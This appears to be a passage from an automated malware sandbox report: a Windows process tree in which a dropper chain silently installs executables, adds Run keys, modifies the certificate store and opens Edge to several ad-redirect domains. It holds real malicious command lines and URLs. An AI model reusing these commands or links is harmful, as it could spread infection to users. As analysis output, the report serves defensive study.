                                                                                • C:\Users\Admin\AppData\Local\Temp\is-VQ9TR.tmp\Sat20fbae42a4.tmp
                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-VQ9TR.tmp\Sat20fbae42a4.tmp" /SL5="$3012E,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20fbae42a4.exe"
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  PID:5272
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-AHL8S.tmp\Ze2ro.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-AHL8S.tmp\Ze2ro.exe" /S /UID=burnerch2
                                                                                    7⤵
                                                                                    • Drops file in Drivers directory
                                                                                    • Executes dropped EXE
                                                                                    • Adds Run key to start application
                                                                                    • Drops file in Program Files directory
                                                                                    PID:5772
                                                                                    • C:\Program Files\Windows Defender Advanced Threat Protection\PXXLGNYZKI\ultramediaburner.exe
                                                                                      "C:\Program Files\Windows Defender Advanced Threat Protection\PXXLGNYZKI\ultramediaburner.exe" /VERYSILENT
                                                                                      8⤵
                                                                                        PID:3200
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-FB65A.tmp\ultramediaburner.tmp
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-FB65A.tmp\ultramediaburner.tmp" /SL5="$4026E,281924,62464,C:\Program Files\Windows Defender Advanced Threat Protection\PXXLGNYZKI\ultramediaburner.exe" /VERYSILENT
                                                                                          9⤵
                                                                                          • Drops file in Program Files directory
                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                          PID:6496
                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                            "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                            10⤵
                                                                                              PID:3492
                                                                                        • C:\Users\Admin\AppData\Local\Temp\e4-cfcb5-f56-97e90-cbd743f01b99c\Qoteciqigae.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\e4-cfcb5-f56-97e90-cbd743f01b99c\Qoteciqigae.exe"
                                                                                          8⤵
                                                                                            PID:5836
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                              9⤵
                                                                                              • Adds Run key to start application
                                                                                              • Enumerates system info in registry
                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                              PID:11260
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ff8de6e46f8,0x7ff8de6e4708,0x7ff8de6e4718
                                                                                                10⤵
                                                                                                  PID:11368
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2
                                                                                                  10⤵
                                                                                                    PID:12064
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 /prefetch:3
                                                                                                    10⤵
                                                                                                      PID:12108
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8
                                                                                                      10⤵
                                                                                                        PID:12136
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
                                                                                                        10⤵
                                                                                                          PID:12576
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
                                                                                                          10⤵
                                                                                                            PID:12616
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1
                                                                                                            10⤵
                                                                                                              PID:13164
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4808 /prefetch:1
                                                                                                              10⤵
                                                                                                                PID:13204
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4048 /prefetch:1
                                                                                                                10⤵
                                                                                                                  PID:5780
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5056 /prefetch:8
                                                                                                                  10⤵
                                                                                                                    PID:4060
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5056 /prefetch:8
                                                                                                                    10⤵
                                                                                                                      PID:7212
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2820 /prefetch:2
                                                                                                                      10⤵
                                                                                                                        PID:12944
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1
                                                                                                                        10⤵
                                                                                                                          PID:1692
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4728 /prefetch:8
                                                                                                                          10⤵
                                                                                                                            PID:7848
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:1
                                                                                                                            10⤵
                                                                                                                              PID:4192
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3612 /prefetch:8
                                                                                                                              10⤵
                                                                                                                                PID:7156
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5368 /prefetch:8
                                                                                                                                10⤵
                                                                                                                                  PID:2164
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4624 /prefetch:1
                                                                                                                                  10⤵
                                                                                                                                    PID:4360
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2896 /prefetch:1
                                                                                                                                    10⤵
                                                                                                                                      PID:9240
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=3704 /prefetch:8
                                                                                                                                      10⤵
                                                                                                                                        PID:9368
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5920 /prefetch:8
                                                                                                                                        10⤵
                                                                                                                                          PID:6852
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4692 /prefetch:8
                                                                                                                                          10⤵
                                                                                                                                            PID:10044
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5940 /prefetch:8
                                                                                                                                            10⤵
                                                                                                                                              PID:2036
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3164 /prefetch:1
                                                                                                                                              10⤵
                                                                                                                                                PID:8508
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1
                                                                                                                                                10⤵
                                                                                                                                                  PID:5984
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:1
                                                                                                                                                  10⤵
                                                                                                                                                    PID:9604
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3016 /prefetch:1
                                                                                                                                                    10⤵
                                                                                                                                                      PID:11228
                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3060 /prefetch:1
                                                                                                                                                      10⤵
                                                                                                                                                        PID:11580
                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:1
                                                                                                                                                        10⤵
                                                                                                                                                          PID:11760
                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
                                                                                                                                                          10⤵
                                                                                                                                                            PID:9964
                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                                                                                                                                                          9⤵
                                                                                                                                                            PID:7988
                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8de6e46f8,0x7ff8de6e4708,0x7ff8de6e4718
                                                                                                                                                              10⤵
                                                                                                                                                                PID:5364
                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
                                                                                                                                                              9⤵
                                                                                                                                                                PID:8976
                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8de6e46f8,0x7ff8de6e4708,0x7ff8de6e4718
                                                                                                                                                                  10⤵
                                                                                                                                                                    PID:8960
                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
                                                                                                                                                                  9⤵
                                                                                                                                                                    PID:10388
                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x110,0x114,0x118,0xec,0x11c,0x7ff8de6e46f8,0x7ff8de6e4708,0x7ff8de6e4718
                                                                                                                                                                      10⤵
                                                                                                                                                                        PID:5160
                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
                                                                                                                                                                      9⤵
                                                                                                                                                                        PID:8140
                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8de6e46f8,0x7ff8de6e4708,0x7ff8de6e4718
                                                                                                                                                                          10⤵
                                                                                                                                                                            PID:9460
                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
                                                                                                                                                                          9⤵
                                                                                                                                                                            PID:9316
                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8de6e46f8,0x7ff8de6e4708,0x7ff8de6e4718
                                                                                                                                                                              10⤵
                                                                                                                                                                                PID:10636
                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
                                                                                                                                                                              9⤵
                                                                                                                                                                                PID:5508
                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8de6e46f8,0x7ff8de6e4708,0x7ff8de6e4718
                                                                                                                                                                                  10⤵
                                                                                                                                                                                    PID:8656
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\4f-21c38-c9d-b148f-9a9f478d18995\Faqitapufi.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\4f-21c38-c9d-b148f-9a9f478d18995\Faqitapufi.exe"
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:1064
                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pj3e2znv.unq\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                    9⤵
                                                                                                                                                                                      PID:10768
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\pj3e2znv.unq\GcleanerEU.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\pj3e2znv.unq\GcleanerEU.exe /eufive
                                                                                                                                                                                        10⤵
                                                                                                                                                                                          PID:8588
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 8588 -s 240
                                                                                                                                                                                            11⤵
                                                                                                                                                                                            • Program crash
                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                            PID:10396
                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gg35e2bq.zoa\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                        9⤵
                                                                                                                                                                                          PID:8232
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\gg35e2bq.zoa\installer.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\gg35e2bq.zoa\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                            10⤵
                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                            • Modifies system certificate store
                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                            PID:8784
                                                                                                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\gg35e2bq.zoa\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\gg35e2bq.zoa\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632000318 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                                                              11⤵
                                                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                                                              PID:6712
                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0jrt5ohb.jsz\anyname.exe & exit
                                                                                                                                                                                          9⤵
                                                                                                                                                                                            PID:8396
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\0jrt5ohb.jsz\anyname.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\0jrt5ohb.jsz\anyname.exe
                                                                                                                                                                                              10⤵
                                                                                                                                                                                                PID:8708
                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pee2ejmm.nk5\gcleaner.exe /mixfive & exit
                                                                                                                                                                                              9⤵
                                                                                                                                                                                                PID:8616
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\pee2ejmm.nk5\gcleaner.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\pee2ejmm.nk5\gcleaner.exe /mixfive
                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                    PID:9168
